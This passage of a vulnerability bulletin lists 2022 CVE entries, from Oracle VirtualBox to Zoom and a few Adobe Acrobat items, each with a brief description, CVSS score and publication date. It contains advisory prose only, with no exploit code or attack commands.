oracle — vm_virtualbox Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Difficult to exploit vulnerability allows unauthenticated attacker with network access via VRDP to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H). 2022-10-18 8.1 CVE-2022-39426
MISC
oracle — vm_virtualbox Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H). 2022-10-18 7.5 CVE-2022-21620
MISC
oracle — vm_virtualbox Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.38. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H). 2022-10-18 7.5 CVE-2022-39422
MISC
oracle — vm_virtualbox Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: This vulnerability applies to Windows systems only. CVSS 3.1 Base Score 7.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H). 2022-10-18 7.3 CVE-2022-39421
MISC
oracle — web_applications_desktop_integrator Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). 2022-10-18 9.8 CVE-2022-39428
MISC
oringnet — iap-420+_firmware On ORing net IAP-420(+) with FW version 2.0m a telnet server is enabled by default and cannot permanently be disabled. You can connect to the device with hardcoded credentials and get an administrative shell. These credentials are reset to defaults with every reboot. 2022-10-21 8.8 CVE-2022-3203
CONFIRM
osgeo — shapelib A double-free condition exists in contrib/shpsort.c of shapelib 1.5.0 and older releases. This issue may allow an attacker to cause a denial of service or have other unspecified impact via control over malloc. 2022-10-17 9.8 CVE-2022-0699
MISC
MISC
otrs — otrs Article template contents with sensitive data could be accessed from agents without permissions. 2022-10-17 7.5 CVE-2022-3501
MISC
oxhoo — tp50_firmware An issue in OXHOO TP50 OXH1.50 allows unauthenticated attackers to access the administrative panel via browsing to the URL http://device_ip/index1.html. 2022-10-14 9.1 CVE-2022-41436
MISC
pctechsoft — pcsecure In PCTechSoft PCSecure V5.0.8.xw, use of Hard-coded Credentials in configuration files leads to admin panel access. 2022-10-20 7.8 CVE-2022-42176
MISC
perfact — openvpn-client An attacker can leverage PerFact OpenVPN-Client versions 1.4.1.0 and prior to send the config command from any application running on the local host machine to force the back-end server into initializing a new OpenVPN instance with arbitrary OpenVPN configuration. This could result in the attacker achieving execution with privileges of a SYSTEM user. 2022-10-14 8.8 CVE-2021-27406
CONFIRM
phoenixframework — phoenix socket/transport.ex in Phoenix before 1.6.14 mishandles check_origin wildcarding. NOTE: LiveView applications are unaffected by default because of the presence of a LiveView CSRF token. 2022-10-17 7.5 CVE-2022-42975
MISC
phpmyfaq — phpmyfaq Cross-site Scripting (XSS) – Stored in GitHub repository thorsten/phpmyfaq prior to 3.2.0-alpha. 2022-10-19 8.4 CVE-2022-3608
CONFIRM
MISC
phpok — phpok Phpok 6.1 has a deserialization vulnerability via framework/phpok_call.php. 2022-10-18 9.8 CVE-2022-40889
MISC
MISC
pytest — py The py library through 1.11.0 for Python allows remote attackers to conduct a ReDoS (Regular expression Denial of Service) attack via a Subversion repository with crafted info data, because the InfoSvnCommand argument is mishandled. 2022-10-16 7.5 CVE-2022-42969
MISC
MISC
MISC
qualcomm — apq8009_firmware Memory corruption in video due to buffer overflow while parsing ASF clips in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables 2022-10-19 9.8 CVE-2022-25687
CONFIRM
qualcomm — apq8009_firmware Cryptographic issue in WLAN due to improper check on return value while authentication handshake in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking 2022-10-19 9.8 CVE-2022-25718
CONFIRM
qualcomm — apq8009_firmware Memory corruption in WLAN due to out of bound array access during connect/roaming in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables 2022-10-19 9.8 CVE-2022-25720
CONFIRM
qualcomm — apq8009_firmware Memory corruption in WLAN due to integer overflow to buffer overflow while parsing GTK frames in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking 2022-10-19 9.8 CVE-2022-25748
CONFIRM
qualcomm — apq8009_firmware Information disclosure in WLAN due to improper length check while processing authentication handshake in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking 2022-10-19 9.1 CVE-2022-25719
CONFIRM
qualcomm — apq8009_firmware Transient Denial-of-Service in WLAN due to buffer over-read while parsing MDNS frames in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking 2022-10-19 7.5 CVE-2022-25749
CONFIRM
qualcomm — apq8064au_firmware Memory corruption in automotive multimedia due to use of out-of-range pointer offset while parsing command request packet with a very large type value in Snapdragon Auto 2022-10-19 7.8 CVE-2022-33210
CONFIRM
qualcomm — apq8096au_firmware Information disclosure due to untrusted pointer dereference in kernel in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables 2022-10-19 7.5 CVE-2022-25662
CONFIRM
qualcomm — aqt1000_firmware Memory corruption due to double free issue in kernel in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile 2022-10-19 7.8 CVE-2022-25660
CONFIRM
qualcomm — aqt1000_firmware Memory corruption due to untrusted pointer dereference in kernel in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile 2022-10-19 7.8 CVE-2022-25661
CONFIRM
qualcomm — aqt1000_firmware Denial of service in WLAN due to out-of-bound read happens while processing VHT action frame in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking 2022-10-19 7.5 CVE-2022-25736
CONFIRM
qualcomm — aqt1000_firmware Information disclosure due to buffer over read in kernel in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Mobile 2022-10-19 7.1 CVE-2022-25665
CONFIRM
qualcomm — aqt1000_firmware Memory corruption in display due to time-of-check time-of-use of metadata reserved size in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables 2022-10-19 7 CVE-2022-33214
CONFIRM
qualcomm — kailua_firmware Memory corruption in BTHOST due to double free while music playback and calls over bluetooth headset in Snapdragon Mobile 2022-10-19 8.8 CVE-2022-25750
CONFIRM
qualcomm — sd_8_gen1_5g_firmware Memory corruption in graphics due to use-after-free in graphics dispatcher logic in Snapdragon Mobile 2022-10-19 7.8 CVE-2022-22077
CONFIRM
qualcomm — sd_8_gen1_5g_firmware Memory corruption in multimedia due to use after free during callback registration failure in Snapdragon Mobile 2022-10-19 7.8 CVE-2022-25723
CONFIRM
qualcomm — sd_8_gen1_5g_firmware Memory corruption in Qualcomm IPC due to buffer copy without checking the size of input while starting communication with a compromised kernel in Snapdragon Mobile 2022-10-19 7.8 CVE-2022-33217
CONFIRM
redhat — 3scale_api_management 3scale API Management 2 does not perform adequate sanitation for user input in multiple fields. An authenticated user could use this flaw to inject scripts and possibly gain access to sensitive information or conduct further attacks. 2022-10-19 8.8 CVE-2022-1414
MISC
MISC
redhat — decision_manager A flaw was found in the RHDM, where an authenticated attacker can change their assigned role in the response header. This flaw allows an attacker to gain admin privileges in the Business Central Console. 2022-10-17 8.8 CVE-2019-14841
MISC
MISC
redhat — decision_manager A flaw was found in the RHDM, where sensitive HTML form fields like Password have auto-complete enabled, which may lead to a leak of credentials. 2022-10-17 7.5 CVE-2019-14840
MISC
MISC
redhat — openshift The deployment script in the unsupported “OpenShift Extras” set of add-on scripts, in Red Hat Openshift 1, installs a default public key in the root user’s authorized_keys file. 2022-10-19 7.5 CVE-2013-4253
MISC
MISC
rockwellautomation — factorytalk_vantagepoint Rockwell Automation FactoryTalk VantagePoint versions 8.0, 8.10, 8.20, 8.30, 8.31 are vulnerable to an input validation vulnerability. The FactoryTalk VantagePoint SQL Server lacks input validation when users enter SQL statements to retrieve information from the back-end database. If successfully exploited, this could allow a user with basic user privileges to perform remote code execution on the server. 2022-10-17 8.8 CVE-2022-3158
MISC
rockwellautomation — factorytalk_vantagepoint Rockwell Automation FactoryTalk VantagePoint versions 8.0, 8.10, 8.20, 8.30, 8.31 are vulnerable to an improper access control vulnerability. The FactoryTalk VantagePoint SQL Server account could allow a malicious user with read-only privileges to execute SQL statements in the back-end database. If successfully exploited, this could allow the attacker to execute arbitrary code and gain access to restricted data. 2022-10-17 8.8 CVE-2022-38743
MISC
sanitization_management_system_project — sanitization_management_system A vulnerability was found in SourceCodester Sanitization Management System and classified as critical. This issue affects some unknown processing of the file /php-sms/?p=services/view_service. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-210839. 2022-10-14 9.8 CVE-2022-3504
N/A
N/A
shinken-monitoring — shinken_monitoring Shinken Solutions Shinken Monitoring Version 2.4.3 is vulnerable to Incorrect Access Control. The SafeUnpickler class found in shinken/safepickle.py implements a weak authentication scheme when unserializing objects passed from monitoring nodes to the Shinken monitoring server. 2022-10-20 9.8 CVE-2022-37298
MISC
MISC
siemens — teamcenter_visualization The APDFL.dll in Siemens JT2Go prior to V13.3.0.5 and Siemens Teamcenter Visualization prior to V14.0.0.2 contains an out of bounds write past the fixed-length heap-based buffer while parsing specially crafted PDF files. This could allow an attacker to execute code in the context of the current process. 2022-10-20 7.8 CVE-2022-2069
CONFIRM
CONFIRM
simple_cold_storage_management_system_project — simple_cold_storage_management_system A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /csms/admin/?page=user/manage_user of the component Avatar Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-211049 was assigned to this vulnerability. 2022-10-17 7.2 CVE-2022-3549
N/A
N/A
simple_cold_storage_management_system_project — simple_cold_storage_management_system Simple Cold Storage Management System v1.0 is vulnerable to SQL Injection via /csms/classes/Master.php?f=delete_storage. 2022-10-14 7.2 CVE-2022-42232
MISC
simple_exam_reviewer_management_system_project — simple_exam_reviewer_management_system In Simple Exam Reviewer Management System v1.0 the User List function suffers from insecure file upload. 2022-10-20 8.8 CVE-2022-42198
MISC
MISC
simple_exam_reviewer_management_system_project — simple_exam_reviewer_management_system Simple Exam Reviewer Management System v1.0 is vulnerable to Cross Site Request Forgery (CSRF) via the Exam List. 2022-10-20 8.8 CVE-2022-42199
MISC
MISC
MISC
simple_exam_reviewer_management_system_project — simple_exam_reviewer_management_system Simple Exam Reviewer Management System v1.0 is vulnerable to Insecure file upload. 2022-10-20 7.2 CVE-2022-42201
MISC
MISC
smackcoders — an_ultimate_wordpress_importer_cum_migration_as_csv_&_xml The Import all XML, CSV & TXT WordPress plugin before 6.5.8 does not properly sanitise and escape imported data before using them in SQL statements, leading to SQL injection exploitable by high privilege users such as admin 2022-10-17 7.2 CVE-2022-3243
MISC
solarwinds — orion_platform SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with valid access to SolarWinds Web Console to execute arbitrary commands. 2022-10-20 8.8 CVE-2022-36958
MISC
MISC
solarwinds — orion_platform SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands. 2022-10-20 7.2 CVE-2022-36957
MISC
MISC
solarwinds — orion_platform SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands. 2022-10-20 7.2 CVE-2022-38108
MISC
MISC
synacor — zimbra_collaboration_suite Due to an issue with incorrect sudo permissions, Zimbra Collaboration Suite (ZCS) suffers from a local privilege escalation issue in versions 9.0.0 and prior, where the ‘zimbra’ user can effectively coerce postfix into running arbitrary commands as ‘root’. 2022-10-17 7.8 CVE-2022-3569
MISC
MISC
MISC
synology — diskstation_manager A vulnerability regarding improper restriction of operations within the bounds of a memory buffer is found in the packet decryption functionality of Out-of-Band (OOB) Management. This allows remote attackers to execute arbitrary commands via unspecified vectors. The following models with Synology DiskStation Manager (DSM) versions before 7.1.1-42962-2 may be affected: DS3622xs+, FS3410, and HD6500. 2022-10-20 9.8 CVE-2022-27624
CONFIRM
synology — diskstation_manager A vulnerability regarding improper restriction of operations within the bounds of a memory buffer is found in the message processing functionality of Out-of-Band (OOB) Management. This allows remote attackers to execute arbitrary commands via unspecified vectors. The following models with Synology DiskStation Manager (DSM) versions before 7.1.1-42962-2 may be affected: DS3622xs+, FS3410, and HD6500. 2022-10-20 9.8 CVE-2022-27625
CONFIRM
synology — diskstation_manager A vulnerability regarding concurrent execution using shared resource with improper synchronization (‘Race Condition’) is found in the session processing functionality of Out-of-Band (OOB) Management. This allows remote attackers to execute arbitrary commands via unspecified vectors. The following models with Synology DiskStation Manager (DSM) versions before 7.1.1-42962-2 may be affected: DS3622xs+, FS3410, and HD6500. 2022-10-20 8.1 CVE-2022-27626
CONFIRM
synology — diskstation_manager A vulnerability regarding out-of-bounds read is found in the session processing functionality of Out-of-Band (OOB) Management. This allows remote attackers to obtain sensitive information via unspecified vectors. The following models with Synology DiskStation Manager (DSM) versions before 7.1.1-42962-2 may be affected: DS3622xs+, FS3410, and HD6500. 2022-10-20 7.5 CVE-2022-3576
CONFIRM
tableau — tableau_server Tableau discovered a path traversal vulnerability affecting Tableau Server Administration Agent’s internal file transfer service that could allow remote code execution. Tableau only supports product versions for 24 months after release. Older versions have reached their End of Life and are no longer supported. They are also not assessed for potential security issues and do not receive security updates. 2022-10-17 9.8 CVE-2022-22128
MISC
MISC
tenda — 11n_firmware Tenda 11N with firmware version V5.07.33_cn suffers from an Authentication Bypass vulnerability. 2022-10-20 9.8 CVE-2022-42233
MISC
tenda — ac10_firmware Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/fromNatStaticSetting. 2022-10-17 9.8 CVE-2022-42163
MISC
tenda — ac10_firmware Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetClientState. 2022-10-17 9.8 CVE-2022-42164
MISC
tenda — ac10_firmware Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetDeviceName. 2022-10-17 9.8 CVE-2022-42165
MISC
tenda — ac10_firmware Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetSpeedWan. 2022-10-17 9.8 CVE-2022-42166
MISC
tenda — ac10_firmware Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetFirewallCfg. 2022-10-17 9.8 CVE-2022-42167
MISC
tenda — ac10_firmware Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/fromSetIpMacBind. 2022-10-17 9.8 CVE-2022-42168
MISC
tenda — ac10_firmware Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/addWifiMacFilter. 2022-10-17 9.8 CVE-2022-42169
MISC
tenda — ac10_firmware Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formWifiWpsStart. 2022-10-17 9.8 CVE-2022-42170
MISC
tenda — ac10_firmware Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/saveParentControlInfo. 2022-10-17 9.8 CVE-2022-42171
MISC
tenda — ac15_firmware Tenda AC15 V15.03.05.18 was discovered to contain a stack overflow via the timeZone parameter in the form_fast_setting_wifi_set function. 2022-10-18 7.5 CVE-2022-43259
MISC
tenda — ac18_firmware Tenda AC18 V15.03.05.19(6318) was discovered to contain a stack overflow via the time parameter in the fromSetSysTime function. 2022-10-18 9.8 CVE-2022-43260
MISC
tenda — tx3_firmware Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the list parameter at /goform/SetVirtualServerCfg. 2022-10-19 9.8 CVE-2022-43024
MISC
tenda — tx3_firmware Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the startIp parameter at /goform/SetPptpServerCfg. 2022-10-19 9.8 CVE-2022-43025
MISC
tenda — tx3_firmware Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the endIp parameter at /goform/SetPptpServerCfg. 2022-10-19 9.8 CVE-2022-43026
MISC
tenda — tx3_firmware Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the firewallEn parameter at /goform/SetFirewallCfg. 2022-10-19 9.8 CVE-2022-43027
MISC
tenda — tx3_firmware Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the timeZone parameter at /goform/SetSysTimeCfg. 2022-10-19 9.8 CVE-2022-43028
MISC
tenda — tx3_firmware Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the time parameter at /goform/SetSysTimeCfg. 2022-10-19 9.8 CVE-2022-43029
MISC
thoughtworks — gocd GoCD is a continuous delivery server. GoCD helps you automate and streamline the build-test-release cycle for continuous delivery of your product. GoCD versions prior to 21.1.0 are vulnerable to remote code execution on the server from a malicious or compromised agent. The Spring RemoteInvocation endpoint exposed agent communication and allowed deserialization of arbitrary Java objects, as well as subsequent remote code execution. Exploitation requires agent-level authentication, thus an attacker would need to either compromise an existing agent, its network communication or register a new agent to practically exploit this vulnerability. This issue is fixed in GoCD version 21.1.0. There are currently no known workarounds. 2022-10-14 8.8 CVE-2022-39311
CONFIRM
MISC
MISC
tp-link — ax10_firmware TP-Link AX10v1 V1_211117 allows attackers to execute a replay attack by using a previously transmitted encrypted authentication message and valid authentication token. Attackers are able to login to the web application as an admin user. 2022-10-18 8.1 CVE-2022-41541
MISC
MISC
trumpf — job_order_interface Multiple Trumpf Products in multiple versions use default privileged Windows users and passwords. An adversary may use these accounts to remotely gain full access to the system. 2022-10-17 9.8 CVE-2022-2052
CONFIRM
ucms_project — ucms There is a file inclusion vulnerability in the template management module in UCMS 1.6 2022-10-14 8.8 CVE-2022-42234
MISC
uglifyjs_project — uglifyjs Prototype pollution vulnerability in function DEFNODE in ast.js in mishoo UglifyJS 3.13.2 via the name variable in ast.js. 2022-10-20 9.8 CVE-2022-37598
MISC
MISC
MISC
verint — desktop_and_process_analytics The MSI installer in Verint Desktop Resources 15.2 allows an unprivileged local user to elevate their privileges during install or repair. 2022-10-20 7.8 CVE-2020-12744
MISC
MISC
villatheme — dropshipping_and_fulfillment_for_aliexpress_and_woocommerce Sensitive Data Exposure in Villatheme ALD – AliExpress Dropshipping and Fulfillment for WooCommerce premium plugin <= 1.1.0 on WordPress. 2022-10-14 7.5 CVE-2022-41623
CONFIRM
CONFIRM
wago — 750-8100_firmware WAGO Series PFC100/PFC200, Series Touch Panel 600, Compact Controller CC100 and Edge Controller in multiple versions are prone to a loss of MAC-Address-Filtering after reboot. This may allow a remote attacker to reach the network that should be protected by the MAC address filter. 2022-10-17 7.5 CVE-2022-3281
CONFIRM
webidsupport — webid A security issue was discovered in WeBid <=1.2.2. A Server-Side Request Forgery (SSRF) vulnerability in the admin/theme.php file allows remote attackers to inject payloads via theme parameters to read files across directories. 2022-10-14 9.1 CVE-2022-41477
MISC
webpack.js — loader-utils A Regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils 2.0.0 via the url variable in interpolateName.js. 2022-10-14 7.5 CVE-2022-37603
MISC
MISC
MISC
wedding_planner_project — wedding_planner Wedding Planner v1.0 was discovered to contain an arbitrary file upload vulnerability in the component /Wedding-Management-PHP/admin/photos_add.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file. 2022-10-14 8.8 CVE-2022-41538
MISC
wedding_planner_project — wedding_planner Wedding Planner v1.0 was discovered to contain an arbitrary file upload vulnerability in the component /admin/users_add.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file. 2022-10-14 8.8 CVE-2022-41539
MISC
wire — wire_server Wire is an encrypted communication and collaboration platform. Versions prior to 2022-07-12/Chart 4.19.0 are subject to Token Recipient Confusion. If an attacker has certain details of SAML IdP metadata, and configures their own SAML on the same backend, the attacker can delete all SAML authenticated accounts of a targeted team, authenticate as a user of the attacked team and create arbitrary accounts in the context of the team if it is not managed by SCIM. This issue is fixed in wire-server 2022-07-12 and is already deployed on all Wire managed services. On-premise instances of wire-server need to be updated to 2022-07-12/Chart 4.19.0, so that their backends are no longer affected. As a workaround, the risk of an attack can be reduced by disabling SAML configuration for teams (galley.config.settings.featureFlags.sso). Helm overrides are located in `values/wire-server/values.yaml`. Note that the ability to configure SAML SSO as a team is disabled by default for on-premise installations. 2022-10-18 8.1 CVE-2022-31122
CONFIRM
wisa — smart_wing_cms This vulnerability could allow a remote attacker to execute remote commands with improper validation of parameters of certain API constructors. Remote attackers could use this vulnerability to execute malicious commands such as directory traversal. 2022-10-17 9.8 CVE-2022-23770
MISC
wordpress — wordpress A flaw was found in WordPress 5.1. “X-Forwarded-For” is an HTTP header used to carry the client’s original IP address. However, because these headers may very well be added by the client to the requests, if the systems/devices use IP addresses which are declared in the X-Forwarded-For header instead of the original IP, various issues may be faced. If the data originating from these fields is trusted by the application developers and processed, any authorization checks or originating IP address logging could be manipulated. 2022-10-17 9.8 CVE-2020-35539
MISC
wp_custom_cursors_project — wp_custom_cursors The WP Custom Cursors WordPress plugin through 3.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privileged users such as admin 2022-10-17 7.2 CVE-2022-3150
MISC
x.org — libx11 A vulnerability has been found in X.org libX11 and classified as problematic. This vulnerability affects the function _XimRegisterIMInstantiateCallback of the file modules/im/ximcp/imsClbk.c. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. VDB-211054 is the identifier assigned to this vulnerability. 2022-10-17 7.5 CVE-2022-3554
N/A
N/A
x.org — libx11 A vulnerability was found in X.org libX11 and classified as problematic. This issue affects the function _XFreeX11XCBStructure of the file xcb_disp.c. The manipulation of the argument dpy leads to memory leak. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211055. 2022-10-17 7.5 CVE-2022-3555
N/A
N/A
x.org — x_server A vulnerability classified as critical was found in X.org Server. Affected by this vulnerability is the function _GetCountedString of the file xkb/xkb.c. The manipulation leads to buffer overflow. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211051. 2022-10-17 9.8 CVE-2022-3550
N/A
N/A
x.org — x_server A vulnerability, which was classified as problematic, has been found in X.org Server. Affected by this issue is the function ProcXkbGetKbdByName of the file xkb/xkb.c. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211052. 2022-10-17 7.5 CVE-2022-3551
N/A
N/A
x.org — x_server A vulnerability, which was classified as problematic, was found in X.org Server. This affects an unknown part of the file hw/xquartz/X11Controller.m of the component xquartz. The manipulation leads to denial of service. It is recommended to apply a patch to fix this issue. The identifier VDB-211053 was assigned to this vulnerability. 2022-10-17 7.5 CVE-2022-3553
N/A
N/A
xbifrost — bifrost Bifrost is a heterogeneous middleware that synchronizes MySQL, MariaDB to Redis, MongoDB, ClickHouse, MySQL and other services for production environments. Versions prior to 1.8.8-release are subject to authentication bypass in the admin and monitor user groups by deleting the X-Requested-With: XMLHttpRequest field in the request header. This issue has been patched in 1.8.8-release. There are no known workarounds. 2022-10-19 8.8 CVE-2022-39267
CONFIRM
MISC
zigor — zgr_tps200_ng_firmware In ZGR TPS200 NG 2.00 firmware version and 1.01 hardware version, the firmware upload process does not perform any type of restriction. This allows an attacker to modify it and re-upload it via web with malicious modifications, rendering the device unusable. 2022-10-17 9.1 CVE-2020-8974
CONFIRM
zigor — zgr_tps200_ng_firmware The integrated server of the ZGR TPS200 NG on its 2.00 firmware version and 1.01 hardware version allows a remote attacker to perform actions with the permissions of a victim user. For this to happen, the victim user has to have an active session and trigger the malicious request. 2022-10-17 8.8 CVE-2020-8976
CONFIRM
zigor — zgr_tps200_ng_firmware ZGR TPS200 NG in its 2.00 firmware version and 1.01 hardware version, does not properly accept specially constructed requests. This allows an attacker with access to the network where the affected asset is located, to operate and change several parameters without having to be registered as a user on the web that owns the device. 2022-10-17 8.1 CVE-2020-8973
CONFIRM
zigor — zgr_tps200_ng_firmware ZGR TPS200 NG in its 2.00 firmware version and 1.01 hardware version, allows a remote attacker with access to the web application and knowledge of the routes (URIs) used by the application, to access sensitive information about the system. 2022-10-17 7.5 CVE-2020-8975
CONFIRM
zoom — meetings Zoom Client for Meetings for macOS (Standard and for IT Admin) starting with 5.10.6 and prior to 5.12.0 contains a debugging port misconfiguration. When camera mode rendering context is enabled as part of the Zoom App Layers API by running certain Zoom Apps, a local debugging port is opened by the Zoom client. A local malicious user could use this debugging port to connect to and control the Zoom Apps running in the Zoom client. 2022-10-14 7.8 CVE-2022-28762
MISC
zoom — zoom_on-premise_meeting_connector_mmr Zoom On-Premise Meeting Connector MMR before version 4.8.20220815.130 contains an improper access control vulnerability. As a result, a malicious actor could obtain the audio and video feed of a meeting they were not authorized to join and cause other meeting disruptions. 2022-10-14 8.6 CVE-2022-28759
MISC


Medium Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
74cmsse — 74cmsse 74cmsSE v3.12.0 allows authenticated attackers with low-level privileges to arbitrarily change the rights and credentials of the Super Administrator account. 2022-10-17 6.5 CVE-2022-41471
MISC
74cmsse — 74cmsse 74cmsSE v3.12.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /apiadmin/notice/add. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field. 2022-10-17 5.4 CVE-2022-41472
MISC
abpressoptimizer — ab_press_optimizer Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Mammothology AB Press Optimizer plugin <= 1.1.1 on WordPress. 2022-10-17 4.8 CVE-2022-26375
CONFIRM
CONFIRM
adobe — acrobat_reader_dc Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by a NULL Pointer Dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 5.5 CVE-2022-35691
MISC
adobe — acrobat_reader_dc Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-14 5.5 CVE-2022-38437
MISC
